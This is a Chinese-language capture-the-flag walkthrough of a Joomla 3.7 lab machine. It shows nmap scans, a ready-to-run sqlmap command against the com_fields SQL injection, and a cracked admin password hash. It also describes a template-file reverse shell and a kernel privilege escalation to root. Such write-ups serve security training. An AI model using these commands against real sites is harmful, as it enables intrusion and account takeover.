靶机下载地址
信息收集
主机探测
sudo nmap -sn 10.10.10.0/24
IP:10.10.10.11
初步扫描
sudo nmap -sT --min-rate 10000 -p- 10.10.10.11
仅开放80端口
详细信息扫描
sudo nmap -sT -sC -sV -O -p 80 10.10.10.11
漏洞脚本扫描
sudo nmap -sT --script=vuln -p 80 10.10.10.11
得知存在SQL注入,joomla CMS,版本号3.7
UDP扫描
sudo nmap -sU --top-ports 100 10.10.10.11
WEB指纹识别
访问80端口查看源代码发现是joomlaCMS
查看README.txt文件得到joomla版本号3.7
漏洞利用
SQL注入
使用sqlmap爆破数据库
sqlmap -u "http://10.10.10.11/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
获取到以下用户,密码用john破解,一秒出结果。
admin $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu(snoopy)
后台登陆
使用admin snoopy登录后台
反弹shell
修改error.php里面的代码为反弹shell,你也可以随便选一个php文件。KALI开启监听4444端口
访问该URL 10.10.10.11/templates/beez3/error.php
成功获取反弹shell
权限提升
查看系统信息,该版本的linux存在系统提权漏洞。
使用searchsploit获取漏洞复现程序
传文件解压执行,成功获得root。
flag在/root目录下
总结
首先信息收集发现使用joomlaCMS,版本号3.7,存在SQL注入漏洞,利用该漏洞获取表用户,破解密码,登录后台,修改主题文件PHP代码得到反弹shell,最后利用系统漏洞提权。
扫一扫
3017
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
